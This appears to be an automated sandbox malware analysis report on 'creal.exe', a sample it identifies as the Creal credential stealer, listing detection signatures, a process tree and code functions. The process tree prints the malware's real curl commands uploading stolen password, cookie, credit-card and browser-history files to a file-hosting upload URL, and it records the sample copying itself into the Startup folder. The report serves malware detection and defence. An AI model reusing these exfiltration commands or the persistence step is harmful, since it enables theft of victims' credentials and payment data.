Windows Analysis Report
creal.exe

Overview

General Information

Sample name: creal.exe
Analysis ID: 1592536
MD5: da1695dba8bd25d00e05e7769d6d7e8e
SHA1: 884c5b84185bfcc06b2f82474642e23af842cf26
SHA256: 7166d6cc2435061f32cf982dba8f6ec27fc23a46c9705aa52fb2ba08eb7011aa
Tags: exe, malware, trojan, user-Joker

Detection

Python Stealer, Creal Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Yara detected Creal Stealer
AI detected suspicious sample
Drops PE files to the startup folder
Found many strings related to Crypto-Wallets (likely being stolen)
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal communication platform credentials (via file / registry access)
Yara detected Generic Python Stealer
Binary contains a suspicious time stamp
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
PE file does not import any functions
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Startup Folder File Write
Sigma detected: Usage Of Web Request Commands And Cmdlets
Stores files to the Windows start menu directory
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • creal.exe (PID: 7524 cmdline: "C:\Users\user\Desktop\creal.exe" MD5: DA1695DBA8BD25D00E05E7769D6D7E8E)
    • creal.exe (PID: 7612 cmdline: "C:\Users\user\Desktop\creal.exe" MD5: DA1695DBA8BD25D00E05E7769D6D7E8E)
      • cmd.exe (PID: 7648 cmdline: C:\Windows\system32\cmd.exe /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7656 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 7700 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 1528 cmdline: C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crpasswords.txt" https://store4.gofile.io/uploadFile" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 1760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • curl.exe (PID: 748 cmdline: curl -F "file=@C:\Users\user\AppData\Local\Temp\crpasswords.txt" https://store4.gofile.io/uploadFile MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
      • cmd.exe (PID: 6432 cmdline: C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crcookies.txt" https://store4.gofile.io/uploadFile" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • curl.exe (PID: 7608 cmdline: curl -F "file=@C:\Users\user\AppData\Local\Temp\crcookies.txt" https://store4.gofile.io/uploadFile MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
      • cmd.exe (PID: 4696 cmdline: C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crcreditcards.txt" https://store4.gofile.io/uploadFile" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • curl.exe (PID: 3720 cmdline: curl -F "file=@C:\Users\user\AppData\Local\Temp\crcreditcards.txt" https://store4.gofile.io/uploadFile MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
      • cmd.exe (PID: 1556 cmdline: C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crautofills.txt" https://store4.gofile.io/uploadFile" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 3348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • curl.exe (PID: 1944 cmdline: curl -F "file=@C:\Users\user\AppData\Local\Temp\crautofills.txt" https://store4.gofile.io/uploadFile MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
      • cmd.exe (PID: 2052 cmdline: C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crhistories.txt" https://store4.gofile.io/uploadFile" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 4712 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • curl.exe (PID: 3252 cmdline: curl -F "file=@C:\Users\user\AppData\Local\Temp\crhistories.txt" https://store4.gofile.io/uploadFile MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
      • cmd.exe (PID: 2624 cmdline: C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crbookmarks.txt" https://store4.gofile.io/uploadFile" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 2968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • curl.exe (PID: 3004 cmdline: curl -F "file=@C:\Users\user\AppData\Local\Temp\crbookmarks.txt" https://store4.gofile.io/uploadFile MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
      • dllhost.exe (PID: 7648 cmdline: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} MD5: 08EB78E5BE019DF044C26B14703BD1FA)
  • creal.exe (PID: 4292 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe" MD5: DA1695DBA8BD25D00E05E7769D6D7E8E)
    • creal.exe (PID: 4992 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe" MD5: DA1695DBA8BD25D00E05E7769D6D7E8E)
      • cmd.exe (PID: 7808 cmdline: C:\Windows\system32\cmd.exe /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7812 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 7852 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 3492 cmdline: C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crpasswords.txt" https://store4.gofile.io/uploadFile" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • curl.exe (PID: 3480 cmdline: curl -F "file=@C:\Users\user\AppData\Local\Temp\crpasswords.txt" https://store4.gofile.io/uploadFile MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
      • cmd.exe (PID: 6844 cmdline: C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crcookies.txt" https://store4.gofile.io/uploadFile" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5652 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • curl.exe (PID: 1080 cmdline: curl -F "file=@C:\Users\user\AppData\Local\Temp\crcookies.txt" https://store4.gofile.io/uploadFile MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
      • cmd.exe (PID: 1912 cmdline: C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crcreditcards.txt" https://store4.gofile.io/uploadFile" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5316 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • curl.exe (PID: 2024 cmdline: curl -F "file=@C:\Users\user\AppData\Local\Temp\crcreditcards.txt" https://store4.gofile.io/uploadFile MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
      • cmd.exe (PID: 3632 cmdline: C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crautofills.txt" https://store4.gofile.io/uploadFile" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 2572 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • curl.exe (PID: 2292 cmdline: curl -F "file=@C:\Users\user\AppData\Local\Temp\crautofills.txt" https://store4.gofile.io/uploadFile MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
      • cmd.exe (PID: 316 cmdline: C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crhistories.txt" https://store4.gofile.io/uploadFile" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • curl.exe (PID: 3004 cmdline: curl -F "file=@C:\Users\user\AppData\Local\Temp\crhistories.txt" https://store4.gofile.io/uploadFile MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
      • cmd.exe (PID: 3412 cmdline: C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crbookmarks.txt" https://store4.gofile.io/uploadFile" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 3972 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • curl.exe (PID: 6564 cmdline: curl -F "file=@C:\Users\user\AppData\Local\Temp\crbookmarks.txt" https://store4.gofile.io/uploadFile MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
0000001C.00000003.1716089607.000002085E24E000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CrealStealer | Yara detected Creal Stealer | Joe Security |
0000001C.00000003.1717159393.000002085E25C000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CrealStealer | Yara detected Creal Stealer | Joe Security |
0000001C.00000003.1715402115.000002085F215000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CrealStealer | Yara detected Creal Stealer | Joe Security |
0000001C.00000003.1713151539.000002085E24C000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CrealStealer | Yara detected Creal Stealer | Joe Security |
0000001C.00000003.1711307435.000002085F388000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CrealStealer | Yara detected Creal Stealer | Joe Security |
Source: File created, Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\creal.exe, ProcessId: 7612, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe
Source: Process started, Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crpasswords.txt" https://store4.gofile.io/uploadFile", CommandLine: C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crpasswords.txt" https://store4.gofile.io/uploadFile", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\creal.exe", ParentImage: C:\Users\user\Desktop\creal.exe, ParentProcessId: 7612, ParentProcessName: creal.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crpasswords.txt" https://store4.gofile.io/uploadFile", ProcessId: 1528, ProcessName: cmd.exe
No Suricata rule has matched

AV Detection

Source: creal.exe, Avira: detected
Source: https://discord.gift/, Avira URL Cloud: Label: malware
Source: creal.exe, Virustotal: Detection: 79%
Source: creal.exe, ReversingLabs: Detection: 75%
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 99.9% probability

Location Tracking

Source: unknown, DNS query: name: geolocation-db.com
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F84911C2 CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_set_error,memcpy,CRYPTO_free,CRYPTO_free,28_2_00007FF8F84911C2
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F84D99A0 ERR_new,ERR_set_debug,EVP_MD_CTX_get0_md,EVP_MD_get_size,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_memcmp,ERR_set_mark,ERR_pop_to_mark,ERR_new,ERR_set_debug,ERR_clear_last_mark,EVP_MD_CTX_get0_md,CRYPTO_memcmp,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,28_2_00007FF8F84D99A0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F849193D CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_set_error,28_2_00007FF8F849193D
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F84912D0 CRYPTO_THREAD_run_once,28_2_00007FF8F84912D0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F84F3A90 ERR_new,ERR_set_debug,X509_get0_pubkey,EVP_PKEY_CTX_new_from_pkey,ERR_new,ERR_set_debug,CRYPTO_malloc,EVP_PKEY_encrypt_init,RAND_bytes_ex,EVP_MD_CTX_new,EVP_DigestInit,EVP_DigestUpdate,EVP_DigestUpdate,EVP_DigestFinal_ex,EVP_MD_CTX_free,EVP_PKEY_CTX_ctrl,EVP_PKEY_encrypt,EVP_PKEY_CTX_free,ERR_new,ERR_set_debug,EVP_PKEY_CTX_free,CRYPTO_clear_free,EVP_MD_CTX_free,28_2_00007FF8F84F3A90
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F84A1AA0 CRYPTO_free,CRYPTO_strndup,28_2_00007FF8F84A1AA0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F84C3B10 CRYPTO_malloc,CRYPTO_realloc,ERR_new,ERR_set_debug,ERR_set_error,memset,OSSL_PARAM_locate_const,CRYPTO_strdup,ERR_new,ERR_set_debug,OSSL_PARAM_locate_const,CRYPTO_strdup,ERR_new,OSSL_PARAM_locate_const,OSSL_PARAM_locate_const,CRYPTO_strdup,ERR_new,OSSL_PARAM_locate_const,OSSL_PARAM_get_uint,OSSL_PARAM_locate_const,OSSL_PARAM_get_uint,ERR_new,OSSL_PARAM_locate_const,OSSL_PARAM_locate_const,OSSL_PARAM_get_int,OSSL_PARAM_locate_const,OSSL_PARAM_get_int,OSSL_PARAM_locate_const,OSSL_PARAM_get_int,ERR_set_mark,EVP_KEYMGMT_free,ERR_pop_to_mark,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_free,CRYPTO_free,28_2_00007FF8F84C3B10
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F849FB00 EVP_PKEY_CTX_new_from_pkey,EVP_PKEY_derive_set_peer,EVP_PKEY_is_a,CRYPTO_malloc,ERR_new,ERR_set_debug,EVP_PKEY_derive,ERR_new,ERR_new,ERR_set_debug,CRYPTO_clear_free,EVP_PKEY_CTX_free,ERR_new,ERR_set_debug,28_2_00007FF8F849FB00
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F84DFB00 CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,28_2_00007FF8F84DFB00
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F8491087 ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_THREAD_run_once,CRYPTO_THREAD_run_once,CRYPTO_THREAD_run_once,28_2_00007FF8F8491087
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F84D3C30 CRYPTO_free,CRYPTO_free,OPENSSL_cleanse,CRYPTO_free,CRYPTO_free,OPENSSL_cleanse,CRYPTO_free,CRYPTO_free,28_2_00007FF8F84D3C30
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F84EFCC0 CRYPTO_free,CRYPTO_memdup,28_2_00007FF8F84EFCC0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F8492536 CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,28_2_00007FF8F8492536
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F84A7CB0 CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,28_2_00007FF8F84A7CB0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F84A9D50 CRYPTO_free,CRYPTO_strdup,28_2_00007FF8F84A9D50
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F849176C CRYPTO_malloc,CRYPTO_THREAD_lock_new,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,X509_up_ref,X509_chain_up_ref,CRYPTO_strdup,CRYPTO_strdup,CRYPTO_dup_ex_data,CRYPTO_strdup,CRYPTO_memdup,CRYPTO_memdup,CRYPTO_strdup,CRYPTO_memdup,28_2_00007FF8F849176C
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F84BDDC0 CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_error,_time64,CRYPTO_THREAD_lock_new,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_new_ex_data,CRYPTO_THREAD_lock_free,CRYPTO_free,28_2_00007FF8F84BDDC0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F849157D CRYPTO_free,CRYPTO_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,28_2_00007FF8F849157D
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F84911E0 EVP_PKEY_free,X509_free,EVP_PKEY_free,OPENSSL_sk_pop_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,X509_STORE_free,X509_STORE_free,CRYPTO_free,CRYPTO_THREAD_lock_free,CRYPTO_free,28_2_00007FF8F84911E0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F84B5DE0 CRYPTO_zalloc,CRYPTO_zalloc,OBJ_nid2sn,EVP_get_digestbyname,CRYPTO_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,28_2_00007FF8F84B5DE0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F849108C ERR_new,ERR_set_debug,CRYPTO_free,28_2_00007FF8F849108C
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F84E7DE0 CRYPTO_memdup,CRYPTO_memdup,CRYPTO_memdup,CRYPTO_free,CRYPTO_free,CRYPTO_free,28_2_00007FF8F84E7DE0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F84925EF CRYPTO_malloc,ERR_new,ERR_set_debug,memcpy,ERR_new,ERR_set_debug,28_2_00007FF8F84925EF
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F849FDB0 ERR_new,ERR_set_debug,EVP_PKEY_CTX_new_from_pkey,CRYPTO_malloc,CRYPTO_malloc,EVP_PKEY_encapsulate,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_clear_free,CRYPTO_free,EVP_PKEY_CTX_free,28_2_00007FF8F849FDB0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F8495E4A BIO_get_data,BIO_get_init,BIO_clear_flags,BIO_set_init,CRYPTO_free,CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_error,BIO_set_init,BIO_clear_flags,BIO_get_data,BIO_set_shutdown,BIO_push,BIO_set_next,BIO_up_ref,BIO_set_init,28_2_00007FF8F8495E4A
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F84919E7 CRYPTO_free,28_2_00007FF8F84919E7
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F8493EE0 CRYPTO_free,28_2_00007FF8F8493EE0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F84F9E90 ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_free,CRYPTO_strndup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,28_2_00007FF8F84F9E90
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F8491B31 CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,28_2_00007FF8F8491B31
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F84EFF50 CRYPTO_free,CRYPTO_strndup,28_2_00007FF8F84EFF50
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F8491ACD ERR_new,ERR_set_debug,CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,memcpy,memcpy,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_new,memcpy,ERR_new,memcpy,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_free,28_2_00007FF8F8491ACD
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F84925A4 CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,28_2_00007FF8F84925A4
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F84F3F10 EVP_MD_CTX_new,EVP_DigestInit,EVP_DigestUpdate,EVP_DigestUpdate,EVP_DigestFinal_ex,EVP_MD_CTX_free,CRYPTO_malloc,EVP_PKEY_CTX_ctrl,EVP_PKEY_encrypt,EVP_PKEY_CTX_free,ERR_new,ERR_set_debug,EVP_PKEY_CTX_free,CRYPTO_clear_free,ERR_new,ERR_set_debug,28_2_00007FF8F84F3F10
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F84A7F00 CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_malloc,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,strncmp,CRYPTO_free,CRYPTO_free,OPENSSL_sk_new_null,CRYPTO_free,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_push,OPENSSL_sk_delete,OPENSSL_sk_num,OPENSSL_sk_push,CRYPTO_free,OPENSSL_sk_free,CRYPTO_free,OPENSSL_sk_free,28_2_00007FF8F84A7F00
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F8491B18 ERR_new,ERR_set_debug,memset,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,OPENSSL_cleanse,CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_new,ERR_set_debug,OPENSSL_cleanse,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_memcmp,ERR_new,ERR_new,28_2_00007FF8F8491B18
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F84A5FD0 OPENSSL_sk_new,COMP_get_type,CRYPTO_malloc,OPENSSL_sk_push,OPENSSL_sk_sort,28_2_00007FF8F84A5FD0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F8492400 CRYPTO_memdup,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_free,28_2_00007FF8F8492400
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F84B5F90 CRYPTO_free,CRYPTO_free,28_2_00007FF8F84B5F90
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F849144C EVP_MD_CTX_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_MD_CTX_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_memcmp,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,memcpy,memcpy,28_2_00007FF8F849144C
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F8491D8E CRYPTO_free,CRYPTO_memdup,28_2_00007FF8F8491D8E
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F849107D CRYPTO_free,28_2_00007FF8F849107D
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F84A40F0 CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_THREAD_lock_new,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,28_2_00007FF8F84A40F0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F8492734 CRYPTO_free,CRYPTO_strdup,28_2_00007FF8F8492734
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F84B6080 ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_realloc,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_realloc,ERR_new,ERR_set_debug,ERR_set_error,28_2_00007FF8F84B6080
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F84A60B0 COMP_zlib,OPENSSL_sk_new,COMP_get_type,CRYPTO_malloc,COMP_get_name,OPENSSL_sk_push,OPENSSL_sk_sort,28_2_00007FF8F84A60B0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F84E80B0 CRYPTO_free,CRYPTO_free,28_2_00007FF8F84E80B0
